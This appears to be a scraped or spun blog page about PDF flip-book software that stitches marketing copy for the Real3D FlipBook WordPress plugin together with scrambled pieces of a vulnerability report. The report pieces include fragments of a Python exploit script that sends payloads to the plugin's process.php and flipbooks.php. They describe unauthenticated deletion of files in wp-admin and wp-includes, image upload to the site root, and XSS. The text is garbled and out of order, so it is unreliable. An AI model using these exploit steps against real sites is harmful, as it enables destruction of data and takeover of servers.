solicruise.blogg.se - Pdf flip book php

PDF FLIP BOOK PHP PDF
PDF FLIP BOOK PHP INSTALL
PDF FLIP BOOK PHP FULL
PDF FLIP BOOK PHP SOFTWARE

Print(tabs + '* Multiple Vulnerabilities Found by: *') Print(tabs + '* CodeCanyon Real3D FlipBook WordPress Plugin *') Os.system('cls' if os.name = 'nt' else 'clear') Print(' ' + self.url + '/wp-content/plugins/real3d-flipbook/includes/flipbooks.php?action=' + self.payload3 + '&bookId=' + self.payload3) R = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/flipbooks.php', self.payload3) Print(' Image has been uploaded here ' + self.url + '/' + self.payload2 + '.jpg') R = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', self.payload2, True)

Print(' Uploading image file in target root directory') Print(' Files have been deleted successfully')ĮncodedImage = base64.b64encode(r.content) R = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', self.payload1, True) Print(' Deleting Files from wp-includes/ & wp-admin/') This vulnerability exists in a file wp-content/plugins/real3d-flipbook/includes/process.php. Delete Files or Directories (Unauthenticated) Let's take a look at these vulnerabilities individually.

Cross Site Scripting (XSS) vulnerability.

PDF FLIP BOOK PHP SOFTWARE

Anyone can free download the software to create attractive mobile content for readers. It can help to create an interactive, rich, and engaging mobile experience without writing one line of code.

PDF FLIP BOOK PHP PDF

Upload images in Root directory (Unauthenticated) Mobissue is PDF flip book maker exclusive designed for mobile users.Delete any file or directory from the server (Unauthenticated).While auditing this plugin, I found some critical vulnerabilities which can be exploited by an unauthenticated user and do some real damage to our wordpress installation. We usually audit the code and add some tweaks first.

PDF FLIP BOOK PHP INSTALL

We don't install the plugins directly on our wordpress instance. The company I work for, bought this plugin few days ago and decided to use it on our wordpress blog for the company featured magazine. You can find further details on the official codecanyon page. At the time of writing this post, the plugin costs $32 with $9.60 for extended 12 months support. We can upload PDF files or JPEG images and it will automatically make an interactive flipbook for wordpress posts and pages.

social share – facebook, twitter, google plus.Real 3D Flipbook is a wordpress plugin which uses Web Graphics Library to create 3D flip books.

You can also choose to add engaging elements such as audio, video, external link, and more. The flipbook converter will create an interactive flipbook for you to download.

customizable menu – use only icons that you need To turn a PDF into a flip book, use an online flipbook maker app and just upload your PDF.

retina friendly icons – icon font used for menu icons, fully customizable – change color, size, add drop shadow ect.

PDF FLIP BOOK PHP FULL

real fullscreen support – if fullscreen is not supported by the browser, the icon will not be shown in the menu, if fullscreen is supported it will expand the book in real full screen mode, not browser full screen.

advanced zooming support with mouse wheel zoom on desktop, pinch zoom on mobile, scrollbars when zoomed, touch swipe, click and drag.

choose between 3 types of flip animation – webgl realistic 3d, jquery 2d or CSS3 3d flip animation customizable animation speed and transition type.

smart page loading – only current pages are loaded.

optimized for mobile – look and feel of a native app on mobile with touch swipe, pinch zoom etc.

responsive design – book resizes so it fits screen width or screen height depending on the layout, thumbnails are placed horizontally or vertically depending on the layout.

real 3d – lights, shadows, page bending.